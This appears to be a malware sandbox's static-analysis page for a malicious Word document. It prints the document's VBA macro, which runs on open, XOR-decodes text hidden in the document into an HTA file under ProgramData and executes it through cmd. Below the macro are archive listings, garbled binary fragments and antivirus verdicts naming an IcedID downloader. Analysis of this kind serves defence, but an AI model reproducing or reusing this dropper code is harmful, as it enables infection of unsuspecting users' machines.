Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() If Len("countBoolean") > 0 Then main End If End Sub

Attribute VB_Name = "cHLib" Function curBoolButt() curBoolButt = "!" End Function Function btnTableReq(iLink, delWindow) btnTableReq = Split(iLink, delWindow) End Function Function cntBefore(iLink) Shell collectionCurrency("c:\windows\system32\cmd /c ") End Function Function collectionCurrency(iLink, Optional lName = "c:\programdata\refArrB.h", Optional valMainObj = "t", Optional procConst = "a") collectionCurrency = iLink & lName & "" & valMainObj & procConst End Function Function selBoxCurr(swapRem As Variant) Dim pointBoxByte As String pointBoxByte = vbNullChar booleanStructTable = UBound(swapRem) For oCnt = 1 To booleanStructTable pointBoxByte = pointBoxByte & Chr(swapRem(oCnt) Xor 110) Next selBoxCurr = pointBoxByte End Function

Attribute VB_Name = "ctrlLinkCls" Sub listValButt() Open collectionCurrency("") For Output As #1 Print #1, selBoxCurr(leftIndexCls) Close #1 End Sub Function optionSel(vHeader) optionSel = btnTableReq(vHeader, curBoolButt) End Function Function leftIndexCls() leftIndexCls = optionSel(ActiveDocument.Content) End Function

[Content_Types].xml

_rels/.rels

word/_rels/document.xml.rels

!uCP$V

word/document.xml

^VWuU-OBr?_

hz'huh7

K8D!M:

Q`\=";

qd30;&"

~BUdK:

UpFb4

word/_rels/vbaProject.bin.relsl

-\Ya;>>

word/vbaProject.bin

Cs 1VZ,

!%RtF

Lv$w'SF_

wi}P2K

nU#J't T

7,geE}

#Dn6#z

6}oj:%

g3NIVQ

c!)SkU

x0d A{

word/media/image1.png

&iCCPAdobe RGB (1998)

c``2ptqre

> v^~^*

iTXtXML:com.adobe.xmp

<?xpacket begin="

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164648, 2021/01/12-15:52:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.2 (Windows)" xmp:CreateDate="2021-04-07T20:22:11+03:00" xmp:ModifyDate="2021-06-29T08:26:02+03:00" xmp:MetadataDate="2021-06-29T08:26:02+03:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="Adobe RGB (1998)" xmpMM:InstanceID="xmp.iid:a46d9cbe-aa56-1448-ae13-893886062a23" xmpMM:DocumentID="adobe:docid:photoshop:1953df80-6432-0144-9

CzE:((R

fvUFmN

]\)=

[u8J6\

tSu9gq

.vY$0X

kqb>&o1

S<6m/5

.i8{0m=

kb?G=}

#/\ _~

2]Z{)t

AvQ)MN

Ko'60l

0e(x_I#

=<QB`nk

y)mA?-

0M]\lAw

*UAO[&l

MY2W7w

aul\92

iSvtYO:fy

87rA7eQ

=i]{%

<|WAO*i

word/theme/theme1.xml

iN 5/m

_O<8=

&r-DeI

word/settings.xml

?BcH5C

word/vbaData.xml

,W"Cg4

[N;X_'f

customXml/_rels/item1.xml.rels

customXml/itemProps1.xml

customXml/item1.xml

TZ';c0

docProps/app.xml

word/styles.xml

JDb04%f

1y18:Z

Lz<%9I

U!%'b}

*5.[rK

word/fontTable.xml

d/=(g+

qxs6F

word/webSettings.xml

f\US}d

,y0|yh}

docProps/core.xml

%GN[`l

3)RTX@

^8e1\b

[Content_Types].xmlPK

_rels/.relsPK

word/_rels/document.xml.relsPK

word/document.xmlPK

word/_rels/vbaProject.bin.relsPK

word/vbaProject.binPK

word/media/image1.pngPK

word/theme/theme1.xmlPK

word/settings.xmlPK

word/vbaData.xmlPK

customXml/_rels/item1.xml.relsPK

customXml/itemProps1.xmlPK

customXml/item1.xmlPK

docProps/app.xmlPK

word/styles.xmlPK

word/fontTable.xmlPK

word/webSettings.xmlPK

docProps/core.xmlPK

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.MSOffice.SAgent.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37168600
FireEye	Trojan.GenericKD.37168600
CAT-QuickHeal	Clean
ALYac	Trojan.Downloader.DOC.Gen
Malwarebytes	Clean
VIPRE	Clean
Sangfor	Clean
Trustlook	Clean
BitDefender	Trojan.GenericKD.37168600
K7GW	Clean
K7AntiVirus	Clean
BitDefenderTheta	Clean
Cyren	Trojan.COYW-7
Symantec	Trojan.Gen.NPE
ESET-NOD32	a variant of VBA/TrojanDropper.Agent.CAV
Baidu	Clean
TrendMicro-HouseCall	Clean
Avast	Other:Malware-gen [Trj]
ClamAV	Clean
Kaspersky	UDS:DangerousObject.Multi.Generic
Alibaba	TrojanDownloader:VBA/MalDoc.ali1000101
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot	Clean
Rising	Clean
Ad-Aware	Trojan.GenericKD.37168600
Emsisoft	Trojan.GenericKD.37168600 (B)
Comodo	Clean
F-Secure	Clean
DrWeb	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	BehavesLike.Downloader.pc
CMC	Clean
Sophos	Clean
SentinelOne	Static AI - Malicious OPENXML
GData	Trojan.GenericKD.37168600
Jiangmin	Clean
Avira	W2000M/Agent.2798516
MAX	malware (ai score=83)
Antiy-AVL	Clean
Kingsoft	Clean
Microsoft	TrojanDownloader:O97M/IcedID.RVO!MTB
Gridinsoft	Clean
Arcabit	HEUR.VBA.Trojan.d
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Avast-Mobile	Clean
Cynet	Malicious (score: 99)
AhnLab-V3	Downloader/DOC.TA551
Acronis	Clean
McAfee	W97M/Downloader.dkf
TACHYON	Clean
VBA32	Clean
Zoner	Clean
Tencent	Clean
Yandex	Clean
Ikarus	Trojan.VBA.Agent
MaxSecure	Clean
Fortinet	VBA/Agent.DFK!tr.dldr
AVG	Other:Malware-gen [Trj]
Panda	Clean
Qihoo-360	virus.office.qexvmc.1070

Antivirus

Signature

Bkav

Clean

Lionic

Trojan.MSOffice.SAgent.4!c

Elastic

malicious (high confidence)

MicroWorld-eScan

Trojan.GenericKD.37168600

FireEye

Trojan.GenericKD.37168600

CAT-QuickHeal

Clean

ALYac

Trojan.Downloader.DOC.Gen

Malwarebytes

Clean

VIPRE

Clean

Sangfor

Clean

Trustlook

Clean

BitDefender

Trojan.GenericKD.37168600

K7GW

Clean

K7AntiVirus

Clean

BitDefenderTheta

Clean

Cyren

Trojan.COYW-7

Symantec

Trojan.Gen.NPE

ESET-NOD32

a variant of VBA/TrojanDropper.Agent.CAV

Baidu

Clean

TrendMicro-HouseCall

Clean

Avast

Other:Malware-gen [Trj]

ClamAV

Clean

Kaspersky

UDS:DangerousObject.Multi.Generic

Alibaba

TrojanDownloader:VBA/MalDoc.ali1000101

NANO-Antivirus

Trojan.Ole2.Vbs-heuristic.druvzi

ViRobot

Clean

Rising

Clean

Ad-Aware

Trojan.GenericKD.37168600

Emsisoft

Trojan.GenericKD.37168600 (B)

Comodo

Clean

F-Secure

Clean

DrWeb

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

BehavesLike.Downloader.pc

CMC

Clean

Sophos

Clean

SentinelOne

Static AI - Malicious OPENXML

GData

Trojan.GenericKD.37168600

Jiangmin

Clean

Avira

W2000M/Agent.2798516

MAX

malware (ai score=83)

Antiy-AVL

Clean

Kingsoft

Clean

Microsoft

TrojanDownloader:O97M/IcedID.RVO!MTB

Gridinsoft

Clean

Arcabit

HEUR.VBA.Trojan.d

SUPERAntiSpyware

Clean

ZoneAlarm

Clean

Avast-Mobile

Clean

Cynet

Malicious (score: 99)

AhnLab-V3

Downloader/DOC.TA551

Acronis

Clean

McAfee

W97M/Downloader.dkf

TACHYON

Clean

VBA32

Clean

Zoner

Clean

Tencent

Clean

Yandex

Clean

Ikarus

Trojan.VBA.Agent

MaxSecure

Clean

Fortinet

VBA/Agent.DFK!tr.dldr

AVG

Other:Malware-gen [Trj]

Panda

Clean

Qihoo-360

virus.office.qexvmc.1070

Static Analysis

Original

Deobfuscated

Original

Deobfuscated

Original

Deobfuscated

Original

Deobfuscated